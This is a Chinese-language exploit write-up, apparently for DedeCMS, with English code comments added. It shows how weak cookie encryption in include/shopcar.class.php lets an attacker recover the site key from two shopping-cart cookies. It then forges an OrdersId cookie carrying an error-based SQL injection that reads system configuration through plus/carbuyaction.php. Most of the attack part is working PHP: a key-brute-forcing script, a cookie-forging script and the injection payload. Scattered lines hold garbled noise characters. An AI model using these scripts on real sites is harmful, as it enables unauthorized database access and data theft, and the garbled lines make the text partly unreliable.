www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中
先看一下这个 shopcar 类是如何生成 cookie 的
/**
 * Persist a cart value as a cookie.
 *
 * Array values are first flattened by enCode() into a query-string style
 * string; every value is then passed through enCrypt() before being set.
 * The cookie lives for 36000 seconds and is scoped to the site root.
 * Note: enCrypt() in this class derives its per-cookie key from
 * rand(0, 32000), so the stored value is neither confidential nor
 * integrity-protected and must be treated as client-controlled when read back.
 *
 * @param string $key   cookie name
 * @param mixed  $value scalar value, or an array to be enCode()d first
 */
function saveCookie($key,$value)
{
    $payload = is_array($value)
        ? $this->enCode($value)
        : $value;
    $cookieValue = $this->enCrypt($payload);
    setcookie($key, $cookieValue, time() + 36000, '/');
}
简单地说，$key 就是 cookie 的 key，$value 就是 value；enCode 的作用是将 array 类型转换为 a=yy&b=cc&d=know 这样的形式，关键是 enCrypt 函数。
/**
 * "Encrypt" a string for storage in a cookie.
 *
 * Security review: this construction is not secure.
 *  - The per-cookie key is md5(rand(0, 32000)) with rand() seeded from
 *    microtime(): only 32001 distinct keys are possible, so anyone who
 *    knows or can guess $txt can enumerate all of them.
 *  - For every input byte the output carries the key character itself,
 *    followed by (plaintext byte XOR that key character). The key stream is
 *    therefore written into the output in the clear, and whoever knows the
 *    plaintext can reconstruct the exact string handed to setKey().
 *  - setKey() then applies a site-wide key, so the two points above let that
 *    site-wide key be recovered from observed cookies.
 * A real fix needs a different scheme (random_bytes()-based key material plus
 * an integrity check such as an HMAC, or keeping cart state server-side); it
 * cannot be patched inside this function alone because the decryption
 * counterpart (not shown here) must match the wire format.
 *
 * @param string $txt plaintext
 * @return string base64 of setKey() applied to the interleaved stream
 */
function enCrypt($txt)
{
    // Time-based seed; the key drawn on the next line is bounded to 0..32000.
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // Wrap the key index once all 32 hex characters have been used.
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        // Emits the key character, then plaintext XOR key character; the
        // $ctr++ on the right is intended to leave both halves on the same index.
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode($this->setKey($tmp));
}
/**
 * XOR a string with the site-wide cookie key.
 *
 * The key is md5(strtolower($cfg_cookie_encode)), a fixed 32-character hex
 * string reused for every cookie and cycled byte by byte. This is a
 * repeating-key XOR, not encryption: one known (input, output) pair of at
 * least 32 bytes yields the whole key as input XOR output. Because the
 * caller's output exposes this function's input to anyone who knows the
 * plaintext, rotating $cfg_cookie_encode alone does not help. Note also that
 * the configured value is lowercased before hashing, which shrinks the
 * effective key space.
 *
 * @param string $txt input bytes
 * @return string $txt XORed with the cycled key, same length as $txt
 */
function setKey($txt)
{
    // Site secret read from global configuration; knowledge of this value
    // (or of its md5) is sufficient to forge any cart cookie.
    global $cfg_cookie_encode;
    $encrypt_key = md5(strtolower($cfg_cookie_encode));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // Wrap the key index after 32 characters.
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
enCrypt 的参数 $txt 我们是可知的，返回值就是 cookie 的值，这个我们也是可知的。
然后到了 enCrypt 调用 setKey 时的参数 $tmp，这个参数在某种意义上我们也是可知的，因为 $encrypt_key = md5(rand(0, 32000)); 只有 32000 种可能，我们可以推出 32000 种可能的 $tmp，从而推出 32000 种可能的 md5(strtolower($cfg_cookie_encode))。对了，忘记说了，我们的目的是推测出 setKey 中 $encrypt_key 的值，然后才能任意构造出购物车的 cookie。从推出的 32000 种 md5(strtolower($cfg_cookie_encode)) 中，简单过滤掉非字母数字的 key，就只剩下几百个可能的 key；然后我们再重新下一次订单，再获取几百个可能的 key，取交集，得到最终 key。
具体代码如下：
<?php( |6 e$ T1 c9 S; H( H
// Inputs for the key-recovery demonstration below. $cookie1 and $cookie2 are
// two shopcar cookies the page author captured after placing two orders
// (sample values as given on the page), both assumed to carry the same
// plaintext; $plantxt is the author's reconstruction of that enCode()d plaintext.
$cookie1 = "X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw=="; // here is the first cookie,change here
$cookie2 = "ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ=="; // here is the second cookie ,change here
$plantxt = "id=2&price=0&units=fun&buynum=1&title=naduohua1"; // here is the text , change here
/**
 * Derive a 32-byte key candidate from one cookie and one candidate
 * setKey() input.
 *
 * setKey() is a repeating XOR with a 32-character key, so XORing the first
 * 32 bytes of the decoded cookie with the first 32 bytes of the candidate
 * input yields the key. Both strings are assumed to be at least 32 bytes
 * long; PHP only emits a notice/warning for an out-of-range string offset.
 *
 * @param string $code   base64 cookie value as written by saveCookie()
 * @param string $string candidate input to setKey()
 * @return string 32-byte key candidate
 */
function reStrCode($code,$string)
{
    $code = base64_decode($code);
    $key = "";
    for($i=0 ; $i<32 ; $i++)
    {
        $key .= $string[$i] ^ $code[$i];
    }
    return $key;
}
/**
 * Enumerate every per-cookie key enCrypt() could have used and collect the
 * setKey() key candidates that look like an md5 hex digest.
 *
 * enCrypt() draws its key as md5(rand(0, 32000)); for each candidate $j this
 * loop rebuilds the interleaved "key char, plaintext XOR key char" stream
 * exactly as enCrypt() does and XORs its first 32 bytes against the decoded
 * cookie (reStrCode) to get one key candidate. Candidates are kept only when
 * they consist solely of [a-z0-9], since the real key is an md5 hex string.
 * One cookie still leaves several hundred survivors; the caller intersects
 * the survivors from two cookies.
 *
 * @param string $cookie  base64 cookie value produced by saveCookie()
 * @param string $plantxt assumed plaintext (enCode() output) behind $cookie
 * @return array list of 32-byte key candidates
 */
function getKeys($cookie,$plantxt)
{
    $tmp = $cookie;
    $results = array();
    for($j=0 ; $j < 32000; $j++)
    {

        $txt = $plantxt;
        $ctr = 0;
        $tmp = '';
        // Same derivation as the CMS: rand() yields an int, md5() stringifies it.
        $encrypt_key = md5($j);
        for($i =0; $i < strlen($txt); $i ++)
        {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
        }
        $string = $tmp;
        $code = $cookie;
        $result = reStrCode($code,$string);
        // Keep only candidates that could be a hex digest.
        if(eregi('^[a-z0-9]+$',$result))
        {
            echo $result."\n";
            $results[] = $result;
        }
    }
    return $results;
}
// Run the enumeration once per captured cookie, then print every candidate
// present in both result sets; with two independent cookies the intersection
// is expected to narrow down to the single real key.
$results1 = getKeys($cookie1,$plantxt);
$results2 = getKeys($cookie2,$plantxt);
print "\n——————–real key————————–\n";
foreach($results1 as $test1)
{
    foreach($results2 as $test2)
    {
        if($test1 == $test2)
        {
            echo $test1."\n";
        }
    }
}
?>0 T6 y# P4 m& `( w+ J
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
plantxt 可以根据页面来自己推算，大概就是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出 md5(strtolower($cfg_cookie_encode))
得到这个 key 之后，我们就可以构造任意购物车的 cookie。
接着看
20 class MemberShops; ~7 k9 O/ e" w9 e0 m& ~6 K( ?% u: V
21 {
' ^/ h1 v! p5 X( q0 N* N% ^22 var $OrdersId;
; D, T8 P* h3 F% z+ m& p, A& D1 i _23 var $productsId;
) J+ f0 `- [. q. P/ z3 h! ^9 A240 u8 C; D* N. M: ]. s$ i+ A6 K# J
/**
 * Initialise the cart: the order id is taken from the "OrdersId" cookie and
 * only generated (MakeOrders()) when that cookie is empty.
 *
 * Security review: the cookie is client-controlled. getCookie() is not shown
 * here; presumably it reverses enCrypt(), and since the key of that scheme is
 * recoverable from observed cookies, $this->OrdersId must be treated as
 * untrusted input (carbuyaction.php later interpolates it into SQL). Validate
 * it against the expected id format here, or keep the id server-side in the
 * session instead of trusting the cookie.
 */
function __construct()
{
    $this->OrdersId = $this->getCookie("OrdersId");
    // empty() is also true for "0"; only a missing/empty cookie leads to a
    // fresh id, which MakeOrders() presumably generates.
    if(empty($this->OrdersId))
    {
        $this->OrdersId = $this->MakeOrders();
    }
}
发现OrderId是从cookie里面获取的
然后
/plus/carbuyaction.php中的
$cart = new MemberShops();
// Order id recorded for this request. It comes from the client cookie in
// MemberShops::__construct(), so it is untrusted at this point.
$OrdersId = $cart->OrdersId;
……
// Security review: $OrdersId originates from a client cookie and is
// interpolated into the query without validation or escaping. Validate it
// against the expected id format before it reaches this string; a
// parameterised query would be preferable if the database layer supports it.
$rows = $dsql->GetOne("SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1");
接着我们就可以注入了
通过利用下面代码生成 cookie：
<?php
// Inputs for the cookie-forging demonstration: $txt is the value that will
// end up in the OrdersId cookie (reproduced exactly as the page shows it,
// including its mis-encoded quote characters), and $encrypt_key is the
// md5(strtolower($cfg_cookie_encode)) value the previous script recovered for
// the author's test site (site-specific).
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
$encrypt_key = "9f09293b7419ed68448fb51d5b174834"; // here is the key, please change here
/**
 * Copy of the CMS's setKey() with the site key taken from the global
 * $encrypt_key above instead of md5(strtolower($cfg_cookie_encode)).
 * This is the whole reason the key matters: once that 32-character value is
 * known, cookies indistinguishable from the server's own can be produced.
 *
 * @param string $txt input bytes
 * @return string repeating-key XOR of $txt with $encrypt_key
 */
function setKey($txt)
{
    global $encrypt_key;
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // Wrap the key index after the last key character.
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
/**
 * Copy of the CMS's enCrypt(), calling the local setKey() above instead of
 * the class method. Same wire format: for each input byte the key character
 * followed by (plaintext XOR key character), then setKey() and base64.
 *
 * @param string $txt plaintext
 * @return string base64 of setKey() applied to the interleaved stream
 */
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode(setKey($tmp));
}
// Call enCrypt() repeatedly (each call draws a fresh random per-cookie key)
// until the base64 result contains no '+' character, then print it. The page
// does not say why '+' is avoided.
for($dest =0;$dest = enCrypt($txt);)
{
    if(!strpos($dest,'+'))
    {
        break;
    }
}
echo $dest."\n";
/ N; G4 \1 @ Z8 a& Q?>
& K# h0 B$ ]3 k1 n, O9 u% g& ^6 K9 B2 S1 I- \& P
|